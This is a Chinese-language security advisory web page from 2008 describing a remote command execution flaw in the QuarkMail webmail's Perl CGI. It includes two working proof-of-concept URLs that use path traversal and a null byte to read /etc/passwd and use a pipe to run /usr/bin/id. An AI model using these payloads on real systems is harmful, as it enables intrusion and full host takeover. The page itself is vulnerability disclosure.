繁体中文 | 设本频道为首页 | 收藏本站
自由
免费
共享
当前位置:阅读首页 >> 黑客技术 >> 近期漏洞 >> 快客电邮(QuarkMail)远程命令执行漏洞

快客电邮(QuarkMail)远程命令执行漏洞

2008-10-13 22:54:48  作者:未知  来源:互联网  浏览次数:115  文字大小:【】【】【
关键字:漏洞公告

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。
  漏洞厂商:
http://www.ipmotor.com/
  漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。
  漏洞证明:登录进入系统之后访问如下URL
  
http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes
  即可得到系统账户文件,访问如下URL
  
http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes
  即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。
  漏洞解决:请等待官方补丁

责任编辑:黑色太阳


相关文章
微软紧急安全公告:当心SQL攻击爆发
VoIP要提防UC带来的潜在安全漏洞
Linux安全漏洞被发现可使2.6套件崩溃
Chrome更新项目发布修复Gears高危漏洞
微软Windows蠕虫现身 漏洞威胁攀升
Ubuntu发现影响所有版本内核安全漏洞
微软发出蠕虫警告本年度最大漏洞已经出现威胁
非官方Vista TCP/IP栈漏洞补丁公布
Gmail溢出漏洞可导致长域名劫持
Vista再爆安全漏洞
研究人员发现Vista新的I/O控制漏洞
 
最新文章
· 微软紧急安全公告:当心...
· 微软警告SQL服务器安全漏洞
· VoIP要提防UC带来的潜在...
· Linux安全漏洞被发现可使...
· 微软今日非常规安全更新...
· 微软IE 7 0day漏洞全面解析
· 微软昨天发布的补丁并未...
· IE70DAY漏洞已被黑客大量...
· 微软再现最新XML安全漏洞...
· IE7曝严重漏洞黑客已利用...
推荐文章
· 微软紧急安全公告:当心...
· 微软警告SQL服务器安全漏洞
· VoIP要提防UC带来的潜在...
· Linux安全漏洞被发现可使...
· 微软今日非常规安全更新...
· 微软IE 7 0day漏洞全面解析
· 微软昨天发布的补丁并未...
· IE70DAY漏洞已被黑客大量...
· 微软再现最新XML安全漏洞...
· IE7曝严重漏洞黑客已利用...
热点文章
· IE7曝严重漏洞黑客已利用...
· 微软IE 7 0day漏洞全面解析
· 12月6日病毒预警:“幸运...
· 微软再现惊天漏洞上网看...
· 微软昨天发布的补丁并未...
· 微软年终补丁包将修复八...
· Linux安全漏洞被发现可使...
· IE70DAY漏洞已被黑客大量...
· 微软警告SQL服务器安全漏洞
· 微软再现最新XML安全漏洞...
友情链接 | 诚聘英才 | 关于我们 | 版权声明 | 联系我们 | 广告服务